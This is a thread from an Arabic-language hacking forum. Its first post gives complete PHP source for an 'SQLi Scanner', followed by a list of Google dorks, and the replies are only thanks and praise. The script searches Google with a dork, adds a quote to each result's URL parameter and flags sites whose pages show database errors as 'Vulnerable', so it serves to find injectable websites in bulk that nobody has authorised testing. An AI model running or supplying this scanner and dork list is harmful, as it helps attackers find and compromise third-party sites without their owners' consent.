حالة الموضوع:
مغلق
  1. احمد العراقي

    احمد العراقي ExpErt DeveloPer

    الأنتساب:
    ‏17 سبتمبر 2011
    المشاركات:
    164
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    ~ IQ-T34M ~
    [​IMG]

    السلام عليكم و رحمة الله تعالى و بركاته

    اليوم احبائي اتممت التعديل على سكربت البحث عن تغرات الSQL
    و عملتله موقع خاص فيه للمنتدى
    كما اضفت معه بعض الدوركات الحديثة
    واضفت الهيدر طبعا
    كما قمت بتعريبه
    الكود سورس
    كود PHP:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
    <title>IQ - TEAM SQLi Scanner </title>
    <style>
    body{
    background: #111010;
    color: #F9F9F9;
    font-family: monospace;
    font-size: 12px;

    }

    input{
    background: #111010;
    border: 2px solid #d00a2a;
    color: #ffff00;
    }

    h2{
    color: #55FFCC;
    }

    a{ color: #5A5A5A; text-decoration: none; }
    a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
    a:hover{ color: #00FFCC; text-decoration: line-through; }
    .effectok:hover { text-decoration: underline; }
    .effectfalse:hover { text-decoration: line-through; }

    </style>

    </head>

    <div id="header">
      <div class="right"></div>
      <div class="left"></div>
        <div class="mid">
          <div align="center"><img src="http://www.iq.x10.bz/vb/web2/red-style/hatshy_header01.png" width="365" height="295" border="0" align="top" usemap="#Map">
    <map name="Map" id="Map"><area shape="rect" coords="314,262,353,275" href="http://www.iq.x10.bz/" target="_self" alt="الرئيسية">
    <area shape="rect" coords="261,262,304,276" href="http://www.iq.x10.bz/vb" target="_self" alt="المنتدى">
    <area shape="rect" coords="163,261,254,276" href="http://www.iq.x10.bz/vb" target="_self" alt="الدورات الإحترافية">
    <area shape="rect" coords="68,262,155,276" href="http://www.iq.x10.bz/vb/f20.html" target="_self" alt="SQL-injection">
    <area shape="rect" coords="14,263,58,275" href="sendmessage.php" target="_self" alt="اتصل بنا">
    </map></div>
      </div>
    </div>
    <body align="center">
    <div align=center>

    <?php
    echo "<h1>ArHack TEAM SQLi Scanner<BR></h1>";
    echo 
    "<form action='' method='post'>";
    echo 
    "<b><h3>Dork الدورك</h3> <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
    echo 
    "<input type='submit' value='  GO! '>";
    echo 
    "<hr><br />";

    if(
    $_POST['dork']) {

    @
    set_time_limit(0);
    @
    error_reporting(0);
    @
    ignore_user_abort(true);
    ini_set('memory_limit''128M');

    $google "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

    $i 0;
    $a 0;
    $b 0;

    while(
    $b <= 900) {
    $a 0;
    flush(); ob_flush();
    echo 
    "@ Pages: [ $b ]<br />";
    echo 
    "@ Dork: [ <b>".$_POST['dork']."</b> ]<br />";
    echo 
    "@ Google Scanner ! .<br />";
    flush(); ob_flush();

    if(
    preg_match("/did not match any documents/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $val)) {
    echo 
    "See something but not found??<br />";
    flush(); ob_flush();
    break;
    }

    preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/"Connect_Host(str_replace(array("REPLACE_DORK""REPLACE_START"), array("".$_POST['dork']."""$b"), $google)), $sites);
    echo 
    "Result of injection...<br />";
    flush(); ob_flush();
    while(
    1) {

    if(
    preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/"Connect_Host(str_replace("=""='"$sites[2][$a])))) {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='green'>  الموقع مصـــاب انا بريء منك- Yeah..Vulnerable ! </font><br />";
    } else {
    echo 
    "<a href='".Clean(str_replace("=""='"$sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=""='"$sites[2][$a])."</a> <== <font color='red'> الموقع غير مـصــابNot Vulnerable..sorry! </font><br />";
    flush(); ob_flush();
    }
    if(
    $a count($sites[2])-2) {
    echo 
    "Lets..scan other page.. <br />";
    break;
    }
    $a $a+1;
    }
    $b $b+100;
    }
    }

    function 
    Connect_Host($url) {
    $ch curl_init();
    curl_setopt($chCURLOPT_FOLLOW0);
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_TIMEOUT30);
    $data curl_exec($ch);
    if(
    $data) {
    return 
    $data;
    } else {
    return 
    0;
    }
    }

    function 
    Clean($text) {
    return 
    htmlspecialchars($textENT_QUOTES);
    }

    ?>
    </div>
    </body>
    </html> 

    <center><br><B>|IQ-T34M 2011 © All Rights reserved|</B> <td> 
    </br><p>
    <center> <font color="#D00A2A"><B>We KeeP It ReaL</B><br />By <br />~AHMAD~</font><br /><br />انا بريء من كل من استعملها في ما يخالف ديننا الحنيف <br />تحياتي~<br />D0n3.</center>

    <div align="left">
    Dork 2011 دوركات<br /><br />
    inurl:son.php?idld=<br />
    inurl:special.php?id=<br />
    inurl:club.php?id=<br />
    inurl:colum.php?id=<br />

    inurl:papier.php?id=<br />
    inurl:carton.php?id=<br />
    inurl:learn.php?id=<br />
    inurl:jour.php?id=<br />
    inurl:money.php?id=<br />
    inurl:profile.php?id=<br />
    inurl:go.php?=id<br />

    [​IMG]
     
  2. MrZead0

    MrZead0 Developer

    الأنتساب:
    ‏13 يناير 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    تسلم ايدك ياغالى
    مبدع
     
  3. ŠŦэâm

    ŠŦэâm Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    30
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    PC
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطل واصل ياكنق
     
  4. Tej HAcKEr

    Tej HAcKEr DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وَعليـَكم السلآم ورحمهَ اللهُ وبركآتهُ
    [​IMG]

    مَوضَوعُجـَميل


    يعطيُك الفَ عآفيُه
    [​IMG]
     
  5. shbl

    shbl Developer

    الأنتساب:
    ‏7 مارس 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    السعوديه
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    مشكور ولك مودتي
    منتظرين جديدك
     
  6. مسعود

    مسعود Developer

    الأنتساب:
    ‏9 مارس 2012
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    بطلُ اخـُويُ
     
  7. Wo0oLf

    Wo0oLf DeveloPer Plus

    الأنتساب:
    ‏22 مارس 2012
    المشاركات:
    123
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:
    مقيم في لبنان
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    وعليكم السلآم ورحمة الله وبركآته ،،
    يعطيك ألف ع ـآفية ،
     
  8. كلآشنكوف

    كلآشنكوف Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    88
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: كود سورس سكربت البحث عن تغرات سيكول SQLi SCANNER

    شكرا لك على الموضوع الجميل و المفيذ ♥

    جزاك الله الف خير على كل ما تقدمه لهذا المنتدى
    :{1}:

    ننتظر ابداعاتك الجميلة بفارغ الصبر
    :{8}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة